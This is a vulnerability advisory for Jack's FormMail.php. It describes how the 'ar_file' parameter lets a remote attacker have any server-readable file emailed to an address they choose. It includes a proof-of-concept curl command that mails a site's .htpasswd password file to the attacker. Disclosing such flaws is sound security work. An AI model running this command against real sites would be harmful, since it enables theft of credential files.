Joe Lumbroso FormMail.php Arbitrary Remote File Access Vulnerability
BID:12145
Info
Joe Lumbroso FormMail.php Arbitrary Remote File Access Vulnerability
| Bugtraq ID: | 12145 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 01 2005 12:00AM |
| Updated: | Jan 01 2005 12:00AM |
| Credit: | Reported by Hack Hawk <[email protected]>. |
| Vulnerable: |
Joe Lumbroso Jack's FormMail.php 5.0 Joe Lumbroso Jack's FormMail.php 2.0 |
| Not Vulnerable: | |
Discussion
Joe Lumbroso FormMail.php Arbitrary Remote File Access Vulnerability
It has been reported that it is possible for a remote attacker to obtain any file on the filesystem that is readable by the webserver process corresponding to their session. The "ar_file" variable specifies a file to be included in the outgoing e-mail message. It is possible for an attacker to specify any file by using its relative path. As the recipient of the e-mail message is specified by the client, any file on the filesystem accessible to the server process can be sent to any remote e-mail address.
It has been reported that it is possible for a remote attacker to obtain any file on the filesystem that is readable by the webserver process corresponding to their session. The "ar_file" variable specifies a file to be included in the outgoing e-mail message. It is possible for an attacker to specify any file by using its relative path. As the recipient of the e-mail message is specified by the client, any file on the filesystem accessible to the server process can be sent to any remote e-mail address.
Exploit / POC
Joe Lumbroso FormMail.php Arbitrary Remote File Access Vulnerability
The author provided the following proof-of-concept:
Example Attack:
Assume the following
Script Location : http://yoursite.com/cgi-bin/formmail.php
Password File Location : http://yoursite.com/members/.htpasswd
Use the following curl command to have the password file emailed to you.
# curl -e http://yoursite.com/ -d ar_file=../members/.htpasswd -d
[email protected] http://yoursite.com/cgi-bin/formmail.php
The author provided the following proof-of-concept:
Example Attack:
Assume the following
Script Location : http://yoursite.com/cgi-bin/formmail.php
Password File Location : http://yoursite.com/members/.htpasswd
Use the following curl command to have the password file emailed to you.
# curl -e http://yoursite.com/ -d ar_file=../members/.htpasswd -d
[email protected] http://yoursite.com/cgi-bin/formmail.php
Solution / Fix
Joe Lumbroso FormMail.php Arbitrary Remote File Access Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Joe Lumbroso FormMail.php Arbitrary Remote File Access Vulnerability
References:
References:
- Jacks FormMail.php (Joe Lumbroso)
- Jacks FormMail.php remote file access vulnerability (Hack Hawk
)